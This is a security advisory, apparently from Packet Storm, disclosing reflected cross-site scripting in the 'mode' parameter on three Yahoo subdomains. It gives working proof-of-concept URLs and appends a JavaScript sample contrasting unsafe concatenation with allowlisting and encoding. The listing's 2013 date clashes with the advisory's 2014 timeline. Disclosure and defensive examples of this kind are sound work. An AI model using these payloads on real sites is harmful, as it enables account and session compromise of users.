Yahoo mode Cross Site Scripting

2013-03-09T00:00:00
ID PACKETSTORM:125615
Type packetstorm
Reporter Stefan Schurtz
Modified 2013-03-09T00:00:00

Description

                                        
                                            `  
-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
In Jan '14 I reported three Cross-site Scripting vulnerabilities to the  
Yahoo Bug Bounty Program. And I know, it is really really hard, but ...  
again ... no feedback or bounty :)  
  
Advisory: Yahoo Bug Bounty Program Vulnerability #4 #5 #6 Cross-site Scripting vulnerabilities  
Advisory ID: SSCHADV2014-YahooBB-004 / YahooBB-005 / YahooBB-006  
Author: Stefan Schurtz  
Affected Software: Successfully tested on celebrity.yahoo.com, movies.yahoo.com, music.yahoo.com  
Vendor URL: http://yahoo.com/  
Vendor Status: Not tested anymore  
Bounty: nothing  
  
==========================  
Vulnerability Description  
==========================  
  
The 'mode' parameter on "https://celebrity.yahoo.com/",  
"https://movies.yahoo.com/", "https://music.yahoo.com/" is prone to a  
Cross-site Scripting vulnerability.  
  
==========================  
PoC-Exploit  
==========================  
  
http://celebrity.yahoo.com/video/george-clooney-responds-tina-fey-230813957.html?m_id=&m_mode=&instance_id=&mode=multipart"-alert(document.domain)-"&__phase=pre&type=index  
  
http://movies.yahoo.com/photos/star-wars-cast-rumors-1389647299-slideshow/?m_id=&m_mode=&instance_id=&mode=multipart"-alert(document.domain)-"&__phase=pre&type=index  
  
http://music.yahoo.com/videos/?m_id=&m_mode=&instance_id=&mode=multipart"-alert(document.domain)-"&__phase=pre&type=index  
  
==========================  
Disclosure Timeline  
==========================  
  
20-Jan-2014 - vendor informed by contact form (Yahoo Bug Bounty Program)  
  
==========================  
Credits  
==========================  
  
Vulnerabilities found and advisory written by Stefan Schurtz.  
  
==========================  
References  
==========================  
  
http://yahoo.com/  
http://www.darksecurity.de/advisories/BugBounty/yahoo/SSCHADV2014-YahooBB-004.txt  
http://www.darksecurity.de/advisories/BugBounty/yahoo/SSCHADV2014-YahooBB-005.txt  
http://www.darksecurity.de/advisories/BugBounty/yahoo/SSCHADV2014-YahooBB-006.txt  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.12 (GNU/Linux)  
  
iEYEARECAAYFAlMa8HkACgkQg3svV2LcbMBo9gCeIc8L/kBFOjdNV8J3pmY65UwV  
oFwAn3WBJHwesMpMzG4Z1qxTA10c9sZ0  
=+fff  
-----END PGP SIGNATURE-----  
  
`
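
Added example (not part of the advisory and not Yahoo's code): the "-...-" shape of the PoC value is what a breakout from a double-quoted JavaScript string literal looks like, so this sketch assumes 'mode' was echoed into such a literal and contrasts raw concatenation with an allowlist plus JS-string encoding. The function names, the cfg variable and the "single" mode value are hypothetical.

```javascript
// Constructed sample input: the 'mode' value taken from the advisory's PoC URLs.
const PAYLOAD = 'multipart"-alert(document.domain)-"';

// Allowlist of accepted modes. "multipart" appears in the advisory's URLs;
// "single" is a made-up second value for illustration.
const ALLOWED_MODES = new Set(["multipart", "single"]);

// Vulnerable pattern (assumed sink): raw concatenation into a JS string literal.
function renderUnsafe(mode) {
  return '<script>var cfg = {mode: "' + mode + '"};</script>';
}

// Encode a value for an inline <script> block. JSON.stringify escapes quotes
// and backslashes; the extra replacements stop "</script>" or "<!--" in the
// value from terminating or confusing the script element.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, "\\u003c")
    .replace(/>/g, "\\u003e")
    .replace(/&/g, "\\u0026")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

// Encoding only, to show what the encoder alone does to the payload.
function renderEncodedOnly(mode) {
  return "<script>var cfg = {mode: " + jsStringLiteral(mode) + "};</script>";
}

// Hardened pattern: reject unknown modes first, then encode anyway.
function renderSafe(mode) {
  const value = ALLOWED_MODES.has(mode) ? mode : "multipart";
  return renderEncodedOnly(value);
}

// Evaluate the script body with stubbed alert/document and report whether
// the injected call ran. Only for checking the constructed outputs above.
function alertFired(html) {
  const body = html.replace(/^<script>/, "").replace(/<\/script>$/, "");
  let fired = false;
  const stubAlert = () => { fired = true; };
  new Function("alert", "document", body)(stubAlert, { domain: "example.test" });
  return fired;
}
```

With the raw concatenation the quote in the value closes the string and the call executes; after encoding, the same bytes stay inside the literal as data.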